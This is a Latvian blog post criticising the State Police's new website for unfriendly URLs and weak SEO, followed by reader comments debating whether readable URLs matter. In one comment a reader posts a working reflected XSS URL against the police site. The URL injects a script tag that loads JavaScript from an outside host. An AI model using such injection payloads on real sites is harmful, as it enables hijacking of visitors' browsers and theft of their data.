Valsts policijas jaunā mājaslapa

Vakar vai aizvakar lasīju (vairs nevaru atrast kur), ka Valsts policijai ir jauna mājaslapa. Iegāju apskatīties, bet tur vēl nekā nav. Sabēdājos devos prom. Vakarā vēlreiz pārbaudīju un atkal nekā. Šorīt atcerējos par šo notikumu un devos vēlreiz – šoreiz laime uzspīdēja un ieraudzīju jauno veidojumu.

Laikam šoreiz labāk būtu paklusēt. 😉

Bet, ja nopietni, tad pāris vārdus veltīšu.

Priecē tas, ka Valsts policijā strādā progresīvi cilvēki, kas par spīti visām peripetijām, vēl dara kaut ko, lai uzlabotu savu esamību interneta vidē.

Pieņemu, ka finanšu grūtību dēļ ir atrasts kāds, kurš kaut ko nedaudz saprot no mājaslapu veidošanas un ir uzslējis šo jauno lapu.

Es tagad sākšu piesieties sīkumiem, bet nu nevaru noturēties, jo es vienmēr par to cepos. Šoreiz policijas lapa pārsteidza mani nesagatavotu. 😉

Vēl varēju samierināties ar to, ka pirms desmit vai vienpadsmit gadiem, kad uzrakstīju savu pirmo specifikāciju savai vēlamajai satura vadības sistēmai, es pieminēju, ka adresēm ir jābūt cilvēkam saprotamām. Toreiz bija dzirdami ūūū un āāā par to, ka es pārāk daudz gribu.
Tagad to sauc par SEO url. Nepaslinkoju un uzraku šādu lapu. Nu, kur vēl saprotamāk? 🙂

Sākumā domāju, ka to ir taisījis kāds jaunais censonis, bet jaunie parasti paņem gatavu satura vadības sistēmu vai, piemēram, šajā gadījumā to pašu WordPress, uzliek gatavu tēmu, pieslīpē to, tad piekarina klāt pāris spraudņus un aiziet jūriņā. Tad pamēģināju salīmēt bildi kopā un radās pārliecība, ka tas ir kāds oldschool. Bet tādā gadījumā būtu bijis laiks iepazīties ar regulārajām ekspresijām un izveidot draudzīgas adreses. Padodos – nespēju iedomāties, kurš varētu kaut to tik arhaisku izveidot. Cepos tāpēc, jo man joprojām nomoka profesionālais kretīnisms un gribās zināt, kas notiek industrijai kopumā un kāds ir tās līmenis.

No praktiskā viedokļa – ar draudzīgākām adresēm policijas lapa varētu labāk indeksēties meklētājos un tādējādi iegūt nepieciešamo trafiku.

Lai gan, ja paskatās uz kaimiņiem – Igaunijas un Lietuvas policijas lapas ir tādas pašas – nekādas. 🙂

Vai tagad vajadzētu bēdāties par to, ka mājaslapa ir slikta? Noteikti nē. Tagad vajadzētu norīkot kādu atbildīgo, kas rūpētos par informācijas atjaunošanu. Tas ir vienīgais un būtiskākais nosacījums par kuru vajadzētu satraukties. Ja sabiedrisko attiecību speciālisti pēc labākās sirdsapziņas papildinās un atjaunos informāciju mājaslapā, tad tā dzīvos, ja nē, tad varēs ielikt krustu un atcerēties par to pie nākamām dizaina vai citām izmaiņām.

36 thoughts on “Valsts policijas jaunā mājaslapa

  1. Knaģis

    Visa tā ņemšanās ar SEO – visus šos gadus visi meklētāji tika lieliski galā arī ar vecajiem, nesmukajiem linkiem, vai tad tagad pēkšņi vairs ne? Jā, lietotājam vieglāk uztvert smukos linkus, bet vai tas tomēr nav arī vienīgais reālais iemesls?

    Atbildēt
  2. coolynx Raksta autors

    Knaģis, tas ir retorisks jautājums? No sērijas – vai vajag Windows 2000, XP, Vista vai 7, jo uz Windows 3.1 arī ir pieejams Notepad. 😀

    Atbildēt
  3. Mārtiņš Štāls

    Vispār jau Igaunijas policijas mājaslapai ir SEOiskie linki un informācija citās valodās, ko vēl vairāk var gribēt.
    P.S. Jebkurā gadījumā atbalstu tos, kas kaut ko dara, nevis tos kas tikai kritizē un nedara.

    Atbildēt
  4. Māris

    Lapa ir Ok un tiešām SEO nav tas svarīgākais. Svarīgākais ka informācija ir labi strukturēta un ātri atrodama. Piemēram, Kontakti, Ziņot par noziegumu – kas varētu būt vienas no biežāk lietotām funkcijām un ir viegli atrodamas.
    Lielais banneris/bilde gan ir bezjēdzīga – tā vietā varētu padomāt kā meklējamos cilvēkus parādīt pirmajā lapā.

    Atbildēt
  5. none

    Apakšā rakstīts – Par jautājumiem, kas attiecas uz Valsts policijas mājas lapu, zvanīt uz: +371 67829478, Fakss: +371 6707 5053. E-pastu sūtīt nepienākas 😉

    Atbildēt
  6. hmmm

    manuprāt tā informācija galerijā nepieciešama lai gadījumā ja pārbaudi kādu personu izmantojot google tad atrastu to ka šī persona ir meklēšanā – problēma tāda ka meklējot piemēram “Kristaps Karnītis” netiek atrasta šī galersija – it kā kaut ko atrod tai VP lapā bet ne šo ierakstu… tad nu nezinu kam tās galerijas der.. A tā protams neviens tāpat neiet cauri tām bildēm.

    Atbildēt
  7. skakri

    Jēli, uz pārlūkiem kas nečeko vai neatgriežas līdzīgi dati kā sūtīti (ie – html markup), iespējams xss.

    http://www.vp.gov.lv/?sr='';!--%22%3E%3Cscript/src=http://derp.lv/xss-test.js%3E%3C/script%3E=

    Darbojas uz FF, uz Chrome nē, pārējos nemēģināju; nav laika, jāstrādā.

    Atbildēt
  8. deni2s

    Coolynx, no kurienes tu ņēmi, ka lapas mērķis ir “iegūt nepieciešamo trafiku”?
    Visticamāk, ka lapas mērķis ir formāli izpildīt MK noteikumos nr. 171 “Kārtība, kādā iestādes ievieto informāciju internetā” noteiktās prasības.

    Atbildēt
  9. Anna

    Man šķiet dīvaini visi tie speciālisti, kas šausminās par lapas URL nesmukumu tai pat laikā, kad pašai lapai ir nopietnas drošības problēmas. Es apšaubu jūsu kompetenci, dārgie seri un cienījamās lēdijas (ja te tādas ir)!

    Atbildēt
  10. coolynx Raksta autors

    Anna, ir jāmāk lasīt starp rindām. 😀

    deni2s, apollo.lv adreses arī ir oldskūls, kas nav mainījies kopš pirmssākumiem. Tur pietrūka pavisam nedaudz, lai būtu skaistās adreses, jo viss jau bija izdomāts.

    Atbildēt
  11. Splinter

    “Lai gan, ja paskatās uz kaimiņiem – Igaunijas un Lietuvas policijas lapas ir tādas pašas – nekādas. :)”
    Ja paskatās uz kaimiņiem, tad nav gan tādas pašas, ir daudz slikākas. Man mūsējā pat ļoti patīk. Bet par gaumi nestrīdas, par gaumi brīnās. 🙂

    Atbildēt
  12. angelz

    Es nez par ko tu te viņiem piesienies.. Man liekas normāla lapa, nekas īpašs protams, bet nu tā ir policija, valtsts iestāde. Nevajag viņiem dzeltenzaļu at flašu aizdirstu lapu.

    Atbildēt
  13. Reinis

    Bet nu tomēr apgaismo lūdzu, kur ir lielā pievienotā vērtība tiem SEO-Friendly URL, ārpus meklētāju indeksēšanas tēmas?!

    Bez pašaprotamās TLD un Domain daļas, lietotājs labākajā gadījumā vēl atcerēsies Subdomain. Manuprāt nav un nebūs tā, ka viņš atcerēsies Folders, Page, utt. Tas viss jebkurā gadījumā tiks vai nu CTRL+C vai arī bookmark’ots. Un te nu vairs nav starpības cik tas jauki izkatās. Pat otrādi, īsāks (lai gan nesaprotamāks) links iekš epasta izkatās labāk (prastais lietotājs nelieto “a un HREF”).

    Un, ja tomēr pieminam indeksētājus, tad tie jau ar noindeksēs arī to esošo versiju kāda tā ir, vienīgi, laikam, sadaļas nespēs tik smuki parādīt. Bet nu man ir grūti noticēk, ka no šāda sīkuma varētu būt taustāma strapība lapas “trafikā”. Ir kāds pētījums, kas parāda taustāmu labumu no tās SEO-Friendly URL lietošanas?

    Atbildēt
  14. coolynx Raksta autors

    Reinis, spēks ir mazās lietās jeb niansēs. Kā jau te komentāros minēja, tad dīvainās adreses ir tikai viena no “smalkajām” niansēm, kas veido kopējo tēlu par doto lapu.

    Tajā brīdī, kad nepildīsies lapas pamata būtība – informācija vai komunikācija, tad arī šīs smalkās nianses tiks celtas ārā kā argumenti tam, ka viss ir slikti. 😉

    1999.gada raksts par adrešu pielietojumu toreiz http://www.useit.com/alertbox/990321.html

    Par SEO http://lmgtfy.com/?q=seo+increase+traffic

    Atbildēt
  15. gudrinieks

    tiesa gan visi kaut kā laiž gar acīm, ka monstri amazon, ebay, google joprojām izmanto garus, nesaprotamus, nesmukus un pati lielākā traģēdija – SEO nedraudzīgus urļus.

    http://www.amazon.co.uk/gp/product/B005DD6R6A/ref=s9_pop_gw_ir04/279-3298705-9271550?pf_rd_m=A3P5ROKL5A1OLE&pf_rd_s=center-2&pf_rd_r=1S7XH5MDHKWZQX9WPP4M&pf_rd_t=101&pf_rd_p=246857807&pf_rd_i=468294

    Atbildēt
  16. asiic

    labāk mazs cepiens par urliem, nekā liels cepiens par pārdesmittūkstošiem zemē nomestiem latiem un arī urliem/komentiem/linkiem/utt utjpr.

    Atbildēt
  17. Mārtiņš

    Man patīk, ja varu urli “lasīt”. Un, ja atsauce ir jāpublicē kādā žurnālā, tad nesmuku urļu gadījumā būtu gandrīz obligāti jāizmanto riebīgie urļu īsinātāji.

    Atbildēt
  18. Anonīms

    Gudrinieks mēļo:

    “tiesa gan visi kaut kā laiž gar acīm, ka monstri amazon, ebay, google joprojām izmanto garus, nesaprotamus, nesmukus un pati lielākā traģēdija – SEO nedraudzīgus urļus.”

    Neir taisnība.

    Ēbajā katrai precei ir savs unikāls ID numurs. Pēc ta nr va preci smuki atrast – tik aizsūti numuru, to iemet meklētājā un atverās konkrētās preces apraksts. Un ir pat vēl foināk:

    cgi.ebay.com/250860893825

    Liec tik cgi.ebay.com linka galā strīpu / tur iemet itema numuru un links uz konkrēto preci gatavs. Pieņemu, ka “ķeskas” linkā ir tamdēļ, ka ēbajs tomēr nav viena cilvēka blodziņš, bet gan sastāv no visādiem lokāliem ēbajiem un citādiem brīnumiem. To nevar tā vienkārši nomest mierā uz pusgadu, piepūst vaigus, visu sačiņīt un tad maukt ar jaunu wordpress dizainu. 😉

    Atbildēt
  19. BigUgga

    Taps skolas.lv jaunā versija:

    http://www.tvnet.lv/zinas/latvija/386991-nepopulara_portala_atjaunosana_plano_ieguldit_ls_32_miljonus

    o_O

    Atbildēt
  20. Atbalss: CSDD.lv jaunā mājas lapa | Pods.lv

Ieraksti komentāru

Tava e-pasta adrese netiks publicēta. Obligātie lauki ir atzīmēti kā *